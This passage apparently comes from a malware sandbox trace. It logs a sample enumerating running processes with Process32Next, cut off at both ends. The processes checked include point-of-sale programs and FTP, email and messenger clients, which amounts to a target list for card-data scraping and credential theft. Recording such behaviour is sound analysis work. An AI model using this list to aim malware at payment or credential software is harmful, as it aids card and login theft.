hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0238.415] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0238.417] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0238.418] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0238.425] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-red.exe")) returned 1 [0238.426] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="what_drive_decide.exe")) returned 1 [0238.428] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="truth-statement.exe")) returned 1 [0238.431] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="let_dark.exe")) returned 1 [0238.433] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="safe somebody.exe")) returned 1 [0238.435] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="singthatheart.exe")) returned 1 [0238.437] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="low.exe")) returned 1 [0238.439] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="apply-would.exe")) returned 1 [0238.441] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="of-official.exe")) returned 1 [0238.443] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x484, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="billion.exe")) returned 1 [0238.445] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="newsignsister.exe")) returned 1 [0238.447] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="present-agree.exe")) returned 1 [0238.449] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="article.exe")) returned 1 [0238.451] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="populationread.exe")) returned 1 [0238.453] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="play-religious.exe")) returned 1 [0238.455] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="look.exe")) returned 1 [0238.457] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="love.exe")) returned 1 [0238.459] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel final.exe")) returned 1 [0238.463] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0238.465] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0238.467] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0238.470] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0238.472] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0238.475] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0238.477] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1024, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0238.479] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0238.481] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0238.484] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0238.486] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0238.489] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x106c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0238.490] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0238.493] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0238.495] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0238.498] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0238.504] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0238.507] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0238.509] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0238.512] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0238.514] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0238.517] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0238.520] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0238.522] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0238.524] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0238.527] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0238.529] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0238.531] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0238.533] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0238.535] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0238.538] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0238.540] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0238.545] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0238.547] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0238.549] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0238.551] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0238.553] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0238.556] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0238.558] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0238.560] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0238.562] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1228, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0238.564] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0238.566] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0238.578] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0238.582] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0238.585] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x344, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0238.587] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x344, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 0 [0238.595] CloseHandle (hObject=0x24f0) returned 1 [0238.596] Sleep (dwMilliseconds=0x64) [0238.598] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0238.619] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.621] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x81, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0238.623] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0238.625] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0238.627] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0238.629] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0238.631] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0238.633] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0238.637] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0238.639] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.641] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.643] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0238.645] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x47, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.647] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: 